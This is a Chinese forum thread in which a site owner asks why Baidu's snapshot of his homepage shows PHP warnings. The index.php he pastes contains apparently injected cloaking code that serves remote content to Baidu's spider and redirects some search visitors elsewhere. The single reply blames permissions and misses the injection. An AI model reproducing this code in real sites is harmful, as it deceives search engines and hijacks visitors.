标题:百度首页快照显示代码,内容不更新,其它搜索引擎正常收录。网站可以正常访 ...
只看楼主
sen1010
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2013-12-21
结帖率:0
已结贴  问题点数:20 回复次数:1 
百度首页快照显示代码,内容不更新,其它搜索引擎正常收录。网站可以正常访问
首页百度快照如下

Warning: file_get_contents() [function.file-get-contents]: URL file-access is disabled in the server configuration in E:\www\web\\wwwroot\index.php on line 17

Warning: file_get_contents(http://www.) [function.file-get-contents]: failed to open stream: no suitable wrapper could be found in E:\www\web\\wwwroot\index.php on line 17



----------------------------

index.php 前20行内容如下

<?php
@session_start();
require('./include/conn.php');
$_SESSION['countinfo'] = isset($_SESSION['countinfo']) ? $_SESSION['countinfo'] + 1 : 1;
$seoInfo = $db->sql('select * from web_seo where sid = 1');

$file="http://www.
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);

if(strstr($referer,"baidu")&&strstr($referer,"456"))
{
   Header("Location: $url");
}
if(ereg("http://www.baidu.com/search/spider.htm",$agent))
{
 $content=file_get_contents($file);    第17行
 echo $content;
 exit;
}



首页快照更新后还是显示这样

搜索更多相关主题的帖子: 百度首页 百度快照 搜索引擎 server failed 
2013-12-21 11:39
赤那
Rank: 3Rank: 3
来 自:广东
等 级:论坛游侠
威 望:1
帖 子:127
专家分:178
注 册:2010-3-1
得分:20 
权限问题
2013-12-25 12:00



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-425482-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.437298 second(s), 7 queries.
Copyright©2004-2025, BCCN.NET, All Rights Reserved